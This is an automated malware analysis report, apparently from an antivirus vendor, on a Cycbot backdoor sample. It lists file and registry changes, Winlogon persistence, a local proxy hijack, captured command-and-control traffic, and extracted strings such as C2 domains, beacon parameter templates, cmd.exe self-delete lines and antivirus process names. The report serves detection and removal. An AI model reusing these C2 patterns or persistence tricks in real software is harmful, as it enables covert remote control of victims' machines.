Skip to main content

Backdoor.Win32.Cycbot_558b0fca4b


HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.TDss.71 (B) (Emsisoft), Backdoor.Win32.Cycbot.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 558b0fca4b5859b64ddb4de8cd81dc38

SHA1: 9336495e0cd44a41725f4d0f52d9fdea20a10496

SHA256: 0dbd44bf370c9b1412c743f537219483f67fa42f84a54a8c7b2740c855dde8e8

SSDeep: 3072:XTXJMdOMDY4o45Fn5Ut/BIX8BPCuGQC0Px4Fe9GQ2j:jXJIOMUGyt/Os9LxUe99

Size: 168448 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2005-09-28 00:43:45

Analyzed on: WindowsXP SP3 32-bit

Summary: Backdoor. Malware that enables a remote control of victim's machine.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:452
%original file name%.exe:1740

The Backdoor injects its code into the following process(es):

%original file name%.exe:1288

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1288 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\610FO5KZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe (83025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GEP3EEV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (5088 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (3692 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CNWL890T\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UZ6TULW1\desktop.ini (67 bytes)
%Program Files%\LP\B375\1.exe (43 bytes)
%Program Files%\LP\B375\2.exe (43 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\B375\1.exe (0 bytes)
%Program Files%\LP\B375\2.exe (0 bytes)

Registry activity

The process %original file name%.exe:452 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 92 6D 75 C4 6A 68 E6 6C 56 F3 09 9F 65 3A 59"

The process %original file name%.exe:1740 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F7 88 32 91 64 9A A5 9F 7E 45 6E 11 C6 FD 28"

The process %original file name%.exe:1288 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:56020"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 34 2A B1 7D 5E E8 19 FB F6 96 AF 85 1D 75 26"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:452
    %original file name%.exe:1740

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\610FO5KZ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe (83025 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GEP3EEV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (5088 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CNWL890T\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UZ6TULW1\desktop.ini (67 bytes)
    %Program Files%\LP\B375\1.exe (43 bytes)
    %Program Files%\LP\B375\2.exe (43 bytes)

  4. Remove the references to the Backdoor by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409677186773125.289558718aaccc792a5b818500dec7c22a6d3
.rdata81920116415363.26544a1b666f6622fe5fbd9046095fcbd63ba
.data86016497395880645.50658233e3f44610490bd775172a0ed6ea06d
.rsrc58572840965120.6158141b84a01c3cbb0dec5f8ffefcfe6b8a02

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://highspeedinternetlosangeles.webnode.com/news/1.php?sv=413&tq=gwY92w4AHhik7Ud28t/IeBa0hcXQYY6dLvoBbOm4kqjGnX5wpXwrWwEVqBojRVKaN5ZDZLFYMUFE/YfLyqkEsF5QiZdGajotRARuZDzIGFRGL8XvhQj8opDPRNBh7pc8ctZrjd6wclO0TuqE8u15SEq4/EZc8Qvx5o4j/Ci2UeE3fUeyMvjly901znvgk/ozuY291ayD3V712W9hZ4znQ9rt3eKT9ePpFlcgMMy/M18XhdP5r0wmzsWHRQyfNXt9E5x2NBqSdjOGoRbjJJfMkx+217.11.242.82
hxxp://ttlc6.hdmediastore.com/logo.png?sv=353&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=141.8.226.14
hxxp://ttlc6.hdmediastore.com/logo.png?sv=501&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC9OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=141.8.226.14
hxxp://o0romhln.wwwmediahosts.com/logo.png?sv=501&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC9OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=141.8.226.14

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /news/1.php?sv=413&tq=gwY92w4AHhik7Ud28t/IeBa0hcXQYY6dLvoBbOm4kqjGnX5wpXwrWwEVqBojRVKaN5ZDZLFYMUFE/YfLyqkEsF5QiZdGajotRARuZDzIGFRGL8XvhQj8opDPRNBh7pc8ctZrjd6wclO0TuqE8u15SEq4/EZc8Qvx5o4j/Ci2UeE3fUeyMvjly901znvgk/ozuY291ayD3V712W9hZ4znQ9rt3eKT9ePpFlcgMMy/M18XhdP5r0wmzsWHRQyfNXt9E5x2NBqSdjOGoRbjJJfMkx+ HTTP/1.0

Connection: close

Host: highspeedinternetlosangeles.webnode.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.0 404 Not Found

Content-Type: text/html; charset=utf-8

X-Powered-By: HPHP

Content-Length: 25515

Connection: close

<!doctype html>.<!--[if lt IE 7]> <html class="lt-ie10 lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->.<!--[if IE 7]> <html class="lt-ie10 lt-ie9 lt-ie8" lang="en"> <![endif]-->.<!--[if IE 8]> <html class="lt-ie10 lt-ie9" lang="en"> <![endif]-->.<!--[if IE 9]> <html class="lt-ie10" lang="en"> <![endif]-->.<!--[if gt IE 9]><!-->.<html lang="en">.<!--<![endif]-->..<head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">. <meta name="robots" content="noindex, nofollow" />. <meta name="googlebot" content="noindex, nofollow" />. <title>Webnode Error Page</title>. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <link rel="stylesheet" href="hXXp://static-cdn1.webnode.com/css/404/style.css">. <link href="hXXp://fonts.googleapis.com/css?family=Open Sans:400,400italic,700,700italic|Open Sans Condensed:300,300italic,700&subset=latin,latin-ext" rel="stylesheet" type="text/css">.</head>.......<script type="text/javascript">./* <![CDATA[ */...var defaultLanguage = 'en';.var languageDetectedInRequest = 'en';..var language = defaultLanguage;.if (languageDetectedInRequest == null) //Browser will try to detect language. If it fails, defaultLanguage will be used..{. language = window.navigator.userLanguage || window.navigator.browserLanguage || window.navigat

<<< skipped >>>

GET /logo.png?sv=501&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC9OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= HTTP/1.0

Connection: close

Host: o0romhln.wwwmediahosts.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 200 OK

Date: Thu, 25 Feb 2016 17:11:48 GMT

Server: Apache

Set-Cookie: gvc=919vr2039659084101711; expires=Tue, 23-Feb-2021 17:11:48 GMT; path=/; domain=o0romhln.wwwmediahosts.com; httponly

Vary: Accept-Encoding,User-Agent

Content-Length: 51

Keep-Alive: timeout=5, max=112

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<html><head></head><bo..

GET /logo.png?sv=353&tq=gKZEtzoYwLzEvUb5dQzRsrCpB/AuTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= HTTP/1.0

Connection: close

Host: ttlc6.hdmediastore.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 200 OK

Date: Thu, 25 Feb 2016 17:11:37 GMT

Server: Apache

Set-Cookie: gvc=916vr2039658975731240; expires=Tue, 23-Feb-2021 17:11:37 GMT; path=/; domain=ttlc6.hdmediastore.com; httponly

Vary: Accept-Encoding,User-Agent

Content-Length: 51

Keep-Alive: timeout=5, max=126

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<html><head></head><body><!-- vbe --></body></html>..

Map

The Backdoor connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1288:

`.rsrc

`.rsrc

SSj%S

SSj%S

cmd.exe

cmd.exe

GetProcessWindowStation

GetProcessWindowStation

operator

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

1.2.5

>`Visual C CRT: Not enough memory to complete call to strerror.

>`Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d lines of %s read.

%d Function Prototypes found.

%d Function Prototypes found.

Including %d Library Functions.

Including %d Library Functions.

.bss align=16

.bss align=16

copy /b data.tmp bss.tmp code.tmp %s

copy /b data.tmp bss.tmp code.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

del *.tmp

del *.tmp

copy /b data.tmp code.tmp %s

copy /b data.tmp code.tmp %s

al,%s

al,%s

eax,%s

eax,%s

%s is not valid in:

%s is not valid in:

Warning - Return from non-void function %s with no value

Warning - Return from non-void function %s with no value

elend

elend

.text

.text

Warning -- "break" not supported in:

Warning -- "break" not supported in:

Error: %s not defined!

Error: %s not defined!

.data align=16

.data align=16

B1-1231 Warning - %s re-defined!

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d db 0

times %d dd 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

\Windows NT

%s\%s

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

Advapi32.dll

%s%s_1

%s%s_1

%s_0_%d_%s

%s_0_%d_%s

%s_%d

%s_%d

%s_%d_%d_%d_%d

%s_%d_%d_%d_%d

%s_%s

%s_%s

hXXp://xprstats.com/k1.php

hXXp://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

type=%s&system=na&id=%s&status=%s

t=st&q=%s

t=st&q=%s

%s?tq=%s

%s?tq=%s

TMFLDMN%d

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=117

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=117

%s_%s_%d

%s_%s_%d

_1_%d

_1_%d

_2_%d

_2_%d

_3_%d

_3_%d

_4_%d

_4_%d

firoli-sys.com

firoli-sys.com

hoststorageforyou.com

hoststorageforyou.com

wwwmediahosts.com

wwwmediahosts.com

hdmediastore.com

hdmediastore.com

halinoiser.com

halinoiser.com

allforyourimage.com

allforyourimage.com

onlinepdahelpforyou.com

onlinepdahelpforyou.com

remarkreddomas.com

remarkreddomas.com

transfersakkonline.com

transfersakkonline.com

backupdomaintolevel.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

SELECT_RESERV_SRV_%d

hXXp://%s.%s

hXXp://%s.%s

%s.%s

%s.%s

stor.cfg

stor.cfg

exec%s

exec%s

%s_%d_%s

%s_%d_%s

id=%s&c=%d

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d_%d

%s_%d_%d

%s_%d_%d

%s %s

%s %s

%s start%s%c%s

%s start%s%c%s

c1.exe

c1.exe

c2.exe

c2.exe

c3.exe

c3.exe

DWN_CON_STRP_%d_%s

DWN_CON_STRP_%d_%s

hXXp://

hXXp://

hXXp://%d.ctrl.%s

hXXp://%d.ctrl.%s

logo.png

logo.png

img/135.png

img/135.png

img/136.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

hXXp://binghamtonschools.org/images/297893.jpg

hXXp://binghamtonschools.org/images/297893.jpg

hXXp://binghamtonschools.org/images/297894.jpg

hXXp://binghamtonschools.org/images/297894.jpg

hXXp://alleducationalsoftware.com/creditcardlogos.gif

hXXp://alleducationalsoftware.com/creditcardlogos.gif

hXXp://alleducationalsoftware.com/creditcard.png

hXXp://alleducationalsoftware.com/creditcard.png

hXXp://alleducationalsoftware.com/creditcard2.png

hXXp://alleducationalsoftware.com/creditcard2.png

hXXp://patentgenius.com/temp/head.png

hXXp://patentgenius.com/temp/head.png

hXXp://patentgenius.com/132.gif

hXXp://patentgenius.com/132.gif

hXXp://patentgenius.com/133.gif

hXXp://patentgenius.com/133.gif

hXXp://freedownload3.com/screenshot/4/s/89_3276.gif

hXXp://freedownload3.com/screenshot/4/s/89_3276.gif

hXXp://freedownload3.com/screenshot/4/s/89_3277.gif

hXXp://freedownload3.com/screenshot/4/s/89_3277.gif

hXXp://freedownload3.com/screenshot/4/s/89_3278.gif

hXXp://freedownload3.com/screenshot/4/s/89_3278.gif

hXXp://istockanalyst.com/png/intel.gif

hXXp://istockanalyst.com/png/intel.gif

hXXp://istockanalyst.com/png/intel.jpg

hXXp://istockanalyst.com/png/intel.jpg

hXXp://istockanalyst.com/12.jpg

hXXp://istockanalyst.com/12.jpg

hXXp://complaintsboard.com/complaints/logo.png

hXXp://complaintsboard.com/complaints/logo.png

hXXp://complaintsboard.com/complaints/zip.png

hXXp://complaintsboard.com/complaints/zip.png

hXXp://complaintsboard.com/complaints/rar.png

hXXp://complaintsboard.com/complaints/rar.png

hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi

hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi

hXXp://highspeedinternetlosangeles.webnode.com/news/1.php

hXXp://highspeedinternetlosangeles.webnode.com/news/1.php

hXXp://highspeedinternetlosangeles.webnode.com/news/2.php

hXXp://highspeedinternetlosangeles.webnode.com/news/2.php

hXXp://newworldorderreport.com/favicon.ico

hXXp://newworldorderreport.com/favicon.ico

hXXp://newworldorderreport.com/img/3421.png

hXXp://newworldorderreport.com/img/3421.png

hXXp://newworldorderreport.com/img/3422.png

hXXp://newworldorderreport.com/img/3422.png

hXXp://jointhenewworldorder.com/images/pages.jpg

hXXp://jointhenewworldorder.com/images/pages.jpg

hXXp://jointhenewworldorder.com/images/pages.png

hXXp://jointhenewworldorder.com/images/pages.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

hXXp://cdn.adventofdeception.com/logo.png

hXXp://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

%s?sv=%d&tq=%s

\bl%d_64.bat

\bl%d_64.bat

del "%s"

del "%s"

if exist "%s" goto a

if exist "%s" goto a

cmd.exe /c "%s"

cmd.exe /c "%s"

GET %s HTTP/1.1

GET %s HTTP/1.1

Host: %s

Host: %s

User-Agent: chrome/9.0

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

ahst.lni

milktoyoustudios.com

milktoyoustudios.com

hXXp://%s/s.php?c=121&id=%s

hXXp://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

bigbulkhypnocrys.com

hXXp://xprstats.com/images/logo.png

hXXp://xprstats.com/images/logo.png

drweb

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

t=ml&q=%s

xprstats.com

xprstats.com

hXXp://%s%s

hXXp://%s%s

%s_1_%d_%s

%s_1_%d_%s

%s_2_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_3_%d_%s

%s_4_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

pmv=2&id=%s&hwid=%s

u.exe

u.exe

%s up%s

%s up%s

&%s=%s

&%s=%s

avgnt.exe

avgnt.exe

AVGIDSAgent.exe

AVGIDSAgent.exe

avgwdsvc.exe

avgwdsvc.exe

ccsvchst.exe

ccsvchst.exe

AvastUI.exe

AvastUI.exe

mcagent.exe

mcagent.exe

PRM_LSTN_THIS_PORT

PRM_LSTN_THIS_PORT

Opera

Opera

127.0.0.1

127.0.0.1

HTTP/1.x

HTTP/1.x

google.com

google.com

hXXp://VVV.google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

HTTP/1.1 302 Found

Location: %s

Location: %s

id=%s&type=%d&ppcid=%s

id=%s&type=%d&ppcid=%s

%s: %s

%s: %s

%s_5_%s

%s_5_%s

http=127.0.0.1:

http=127.0.0.1:

prefs.js

prefs.js

Mozilla

Mozilla

"network.proxy.http"

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.http_port"

"network.proxy.type"

"network.proxy.type"

"127.0.0.1"

"127.0.0.1"

%s(%s, %s);

%s(%s, %s);

operaprefs.ini

operaprefs.ini

Use HTTP

Use HTTP

HTTP server

HTTP server

127.0.0.1:%s

127.0.0.1:%s

%s=%s

%s=%s

%s:%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

id=%s&hwid=%s

exec|%s

exec|%s

http=

http=

HTTP/1.0 200 OK

HTTP/1.0 200 OK

bing.com

bing.com

yahoo.com

yahoo.com

search.aol.

search.aol.

suche.aol.

suche.aol.

searcht2.aol.

searcht2.aol.

.yimg.com

.yimg.com

.bing.net

.bing.net

scorecardresearch.com

scorecardresearch.com

brightcove.com

brightcove.com

.aol.

.aol.

.atwola.

.atwola.

.ivwbox.

.ivwbox.

.google

.google

.atdmt.

.atdmt.

.abmr.

.abmr.

.tacoda.

.tacoda.

.adtechus.

.adtechus.

.autodatadirect.

.autodatadirect.

.mapquestapi.

.mapquestapi.

.ggpht.

.ggpht.

.virtualearth.

.virtualearth.

.opera.

.opera.

.microsoft.

.microsoft.

.wsod.

.wsod.

.doubleclick.

.doubleclick.

.ypcdn.

.ypcdn.

.truveo.

.truveo.

.tlowdb.

.tlowdb.

mapq.st

mapq.st

.dartsearch.

.dartsearch.

.thawte.

.thawte.

http://

http://

bing.com/search

bing.com/search

bing.com:80/search

bing.com:80/search

search.yahoo.com/search

search.yahoo.com/search

%s_1_%s

%s_1_%s

err%d%s_%d_%d

err%d%s_%d_%d

err0%s_%d_%d

err0%s_%d_%d

ver=117&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

ver=117&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s:443/%s

%s_2_%s

%s_2_%s

%s_%s_%s

%s_%s_%s

%s_3_%s

%s_3_%s

VVV.VVV.ru

VVV.VVV.ru

hXXps://

hXXps://

.doubleclick.net

.doubleclick.net

doubleclick.net

doubleclick.net

msn.com

msn.com

%s_0%d_%d

%s_0%d_%d

=='undefined'?'%s':'%s'

=='undefined'?'%s':'%s'

.referrer

.referrer

HTTP/1.0

HTTP/1.0

%s %s %s

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

hXXp://VVV.yahoo.com/

.class

.class

.midi

.midi

google_ad.url

google_ad.url

google_ad.title

google_ad.title

r.msn.com

r.msn.com

google_ad.line1

google_ad.line1

zcÁ

zcÁ

c:\%original file name%.exe

c:\%original file name%.exe

%Program Files%\CF2C6

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\B375

%Program Files%\LP\B375

GetCPInfo

GetCPInfo

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

WinHttpReadData

WinHttpReadData

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpOpen

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpSendRequest

WinHttpConnect

WinHttpConnect

WinHttpCloseHandle

WinHttpCloseHandle

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

.rd(&

.rd(&

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

RASAPI32.dll

RASAPI32.dll

RPCRT4.dll

RPCRT4.dll

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

USER32.dll

USER32.dll

WINHTTP.dll

WINHTTP.dll

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

Dr.Web

Dr.Web

mhttp=127.0.0.1:%d

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

hXXp://VVV.yahoo.com

2.0.2.1

2.0.2.1

%original file name%.exe_1288_rwx_00145000_00001000:

